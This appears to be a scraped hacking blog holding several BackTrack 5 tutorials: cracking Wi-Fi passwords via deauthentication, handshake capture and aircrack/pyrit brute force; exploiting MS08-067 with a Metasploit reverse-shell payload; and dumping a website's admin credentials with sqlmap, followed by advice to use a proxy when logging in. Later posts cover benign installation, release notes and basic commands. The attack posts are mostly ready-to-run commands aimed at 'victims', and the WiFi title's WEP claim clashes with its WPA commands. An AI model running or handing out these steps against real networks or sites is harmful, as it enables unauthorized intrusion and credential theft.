HACK WIFI PASSWORD WITH BACKTRACK 5 | .::APAJR::.

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.

Rules to Follow

• A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.


• here a link to download it http://www.backtrack-linux.org/downloads/


• A nearby WEP-enabled Wi-Fi network 


• Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Steps to Follow:

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
-w is the file to be written
--bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you. THANKS YOU AND plz follow me in blog.............

Read More

[Metasploit Tutorial] Hacking Windows XP using IP Address | Back Track | .::APAJR::.

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

• VirtualBox


• Backtrack 5


• Target OS(XP)

Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.

Read More

hack website using backtrack sqlmap | .::APAJR::.

Today i will teach you all, how to hack website admin password using back track.



1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site)

3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website



Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

7. Now you will get the tables list which is stored in aj database.




8. Now lets grab the columns from the admin table

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !


Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

Read More

How to install backtrack5 on virtual machine | .::APAJR::.

You can install backtrack 5 on your system in many ways. You can install it on your system as primary OS. You can also install it as virtual machine on your windows and you can also install it as dual with some other operating system as windows.
The best way as a learner is to use backtrack as a virtual machine on your system. In this way you can use it easily with your windows.


In this tutorial i will show you how to setup backtrack as a virtual machine on your system.


First of all download the backtrack5 from the website
http://www.backtrack-linux.org/downloads/


Then download VMWARE WORKSTATION
http://downloads.vmware.com/


Install VMware workstation on your system and create a new Virtual machine.


select custom (advanced)

Choose the Virtual Machine Hardware Compatibility.
Just click on Next for defaults.
Now select the installer disk image and browse the backtrack image.

Now it will ask the guest operating system. Select Linux, then choose Other Linux 2.6.x kernel as the version.
Give a name to your virtual machine
In memroy config, set the memory for your virtual machine. i will recommend 512 MB.
In network type choose NAT
Then Select SCSI adapter type and Choose LSI Logic
Set Maximum disk size.
I recommend you to select 10GB or above
Choose Store virutal disk as a single file.
Specify disk file and Just click next.

Now backtrack should be loading and booting

After loading type startex to go to GUI mode.

Now run install backtrack.

Read More

Back Track R3 [Realsed] | .::APAJR::.

BACK TRACK 5 R3 REALSED ON (13 AUGUST 2012) , you can download from : http://www.backtrack-linux.org/downloads/



The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task.Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

• BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)


• BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)


• BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)


• BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)


• BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

Read More

Backtrack Basic commands Learning for beginners | .::APAJR::.

OK guys Here i am giving you a list of commands for those who want to learn basics backtrack commands.
Check them all if you have any problem in following any command do comment below the comment box.

How to Log in

Once the installation of BackTrack is done, the default username and password required to log in Those are root(username) / toor (password)

How to Open GUI Environment BackTrack

After you are logged in you can start the GUI Environment by issuing the startx command

How to check IP address

root@bt:~# ifconfig

How to Setup IP Address Manually

root@bt:~# ifconfig eth0 192.168.1.8

root@bt:~# route add default gw 192.168.1.1

root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

How to Change the Root Password

root@bt:~# passwd Enter new UNIX password: {enter your new password here}

Retype new UNIX password: {enter your new password again}

How to start services

root@bt:~# /etc/init.d/openvpn start

Starting Virtual private network daemon(s)…

root@bt:~# /etc/init.d/openvpn stop

passwd: password updated successfully

How to check kernel version

Use the uname -a Shows Kernel Version

Common Apt Commands

apt-get install Downloads and all of its dependencies, and installs or upgrades them.

apt-get remove [--purge] Removes and any packages that depend on it. –purge specifies that packages should be purged.

apt-get update Updates packages listings from the repo, should be run at least once a week.

apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search Searches packages and descriptions for .

apt-cache show Shows the full description of .

apt-cache showpkg Shows a lot more detail about , and its relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less common usage.

Common dpkg commands

dpkg -i Installs a package file; one that you downloaded manually, for example.

dpkg -c Lists the contents of a .deb file.

dpkg -I Extracts package information from a .deb file.

dpkg -r Removes an installed package named

dpkg -P Purges an installed package named . The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L Gives a listing of all the files installed by . See also dpkg -c for checking the contents of a .deb file.

dpkg -s Shows information on the installed package . See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure Reconfigures an installed package

man dpkg Will give you more info on these commands as well as many that are in less common usage.

This is Part 1 I will post more basic commands on backtrack r5 stay connected to learn more on backtrack.

Read More

Free Learn Hacking Tutorials and Penetration Testing on Backtrack 5 | .::APAJR::.

Hello Friends I have decided to post a series of article on backtrack Penetration testingI will explain many attacks with backtrack and also penetration testing with backtrack Os with simple language.So Why to wait start reading Articles on backtrack at home from HackerHub and become Backtrack friendly.

This is the Introduction part of the Backtrack OS:

BackTrack is a GNU/Linux distribution distributed as a Live DVD aimed at digital forensics use and penetration testing.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals,and security experts in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

Tools

BackTrack includes many well known security tools including:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat
A large collection of exploits as well as more commonplace software such as browsers.
Etc...and Many More

Download it from here

http://www.backtrack-linux.org/downloads/

Read More